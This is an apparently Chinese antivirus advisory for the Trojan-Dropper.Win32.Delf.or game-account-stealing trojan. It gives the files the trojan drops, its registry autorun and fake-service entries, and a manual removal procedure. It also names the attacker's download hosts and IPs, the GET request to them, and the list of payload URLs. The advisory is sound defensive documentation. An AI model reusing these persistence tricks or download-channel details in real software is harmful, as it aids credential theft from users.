0
Trojan-Dropper.Win32.Delf.or
病毒名称: Trojan-Dropper.Win32.Delf.or
中文名称: 武汉男生变种
病毒类型: 木马类
文件 MD5: DD26CCAD1848DE5663F0B8892EB4DAE5
公开范围: 完全公开
危害等级: 中等
文件长度: 75,269 字节
感染系统: Win98以上系统
开发工具: Borland Delphi 6.0 - 7.0
加壳类型: nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping [Overlay]
ASPack 2.x (without poly) -> Alexey Solodovnikov
命名对照: 驱逐舰[BackDoor.Pegion.516]
瑞星[Worm.Nimaya.al]
病毒描述:
该病毒运行后,病毒衍生文件到系统目录下,连接某服务器获得要下载病毒的地址到本机运行。添加注册表自动运行项与服务项以随机引导病毒体。该病毒主要为盗取用户游戏账号为主。包括征途、传奇、QQ、热血江湖等。
行为分析:
1、衍生下列副本与文件
%Windir%\ tembay.exe
%Windir%\ly.exe
%Windir%\my.exe
%Windir%\wanmei.exe
%Windir%\wl.exe
%System32%\1.exe
%System32%\2.exe
%System32%\Security.exe
%System32%\iexpl0re.exe
%System32%\userspi.dll
%System32%\wdfmgr32.exe
%System32%\windhcp.ocx
%System32%\winlogin.exe
%System32%\wsvbs.dll
%System32%\twunk32.exe
%System32%\dirvers\ usbme.sys
%System32%\dirvers\ spoclsv.exe
%ProgramFiles%\ Desktop_.ini
2、新建注册表键值:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\policies\Explorer\Run\twin 键值: 字符串: "%WINDIR%
\system32\twunk32.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Run\2ls1essru 键值: 字符串: "%WINDIR%\iexpiore.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Run\wsvbs 键值: 字符串: "%WINDIR%\wanmei.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Run\svcshare
键值: 字符串: "%WINDIR%\system32\drivers\spoclsv.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Run\SymhMy
键值: 字符串: "%WINDIR%\system32\iexpl0re.exe"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ServerAC
\Des cription
键值: 字符串: "给予本地帐户高级保护机制。"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ServerAC
\DisplayName
键值: 字符串: "Server Advance"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ServerAC
\ImagePath
键值: 类型: REG_EXPAND_SZ 长度: 33 (0x21) 字节
%WINDIR%\system32\Security.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc
\Des cription 键值: 字符串: "为远程计算机注册并更新 IP 地址。"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc
\DisplayName 键值: 字符串: "Windows DHCP Service"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc
\ImagePath 键值: 类型: REG_EXPAND_SZ 长度: 52 (0x34) 字节
%WINDIR%\system32\\rundll32.exe windhcp.ocx
3、连接某服务器地址获得要下载的病毒体地址:
www.krvkr.com(58.215.79.164)
www.whboy.net(58.215.79.64)
GET /update/wormcn.txt
User-Agent: QQ
Host: www.whboy.net
wormcn.txt内容:
http://www.krvkr.com/down/cq.exe
http://www.krvkr.com/down/ly.exe
http://www.krvkr.com/down/my.exe
http://www.krvkr.com/down/rx.exe
http://www.krvkr.com/down/wl.exe
http://www.krvkr.com/down/wow.exe
http://www.krvkr.com/down/zt.exe
http://www.krvkr.com/down/wanmei.exe
http://www.krvkr.com/down/dj.exe
http://www.krvkr.com/down/kr/itembay.exe
4、插入线程:
windhcp.ocx 到 explorer.exe进程
userspi.dll 到 explorer.exe进程
wsvbs.dll 到 explorer.exe进程
注:% System%是一个:可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。
--------------------------------------------------------------------------------
清除方案:
1、使用安天木马防线可彻底清除此病毒(推荐)
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1) 使用安天木马防线“进程管理”关闭病毒进程
spoclsv.exe
iexpl0re.exe
(2) 使用安天木马防线禁用下列服务:
Server Advance
(3) 找到下列注册表键值:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc
ImagePath: %WINDdir\system32\\rundll32.exe windhcp.ocx,start
修改为:
ImagePath: %WINDdir\system32\\rundll32.exe
(4) 删除下列文件
%Windir%\ tembay.exe
%Windir%\ly.exe
%Windir%\my.exe
%Windir%\wanmei.exe
%Windir%\wl.exe
%System32%\1.exe
%System32%\2.exe
%System32%\Security.exe
%System32%\iexpl0re.exe
%System32%\userspi.dll
%System32%\wdfmgr32.exe
%System32%\windhcp.ocx
%System32%\winlogin.exe
%System32%\wsvbs.dll
%System32%\twunk32.exe
%System32%\dirvers\ usbme.sys
%System32%\dirvers\ spoclsv.exe
%ProgramFiles%\ Desktop_.ini
(5) 恢复病毒修改的注册表项目,删除病毒添加的注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\policies\Explorer\Run\twin 键值: 字符串: "%WINDIR%\system32\twunk32.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\2ls1essru 键值: 字符串: "%WINDIR%\iexpiore.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\wsvbs 键值: 字符串: "%WINDIR%\wanmei.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
\svcshare 键值: 字符串: "%WINDIR%\system32\drivers\spoclsv.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
\SymhMy 键值: 字符串: "%WINDIR%\system32\iexpl0re.exe"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ServerAC
注:病毒可能会导致用户多次重启,用户可尽快尝试删除注册表自动运行项。一段时间后即可按正常步骤删除病毒文件。
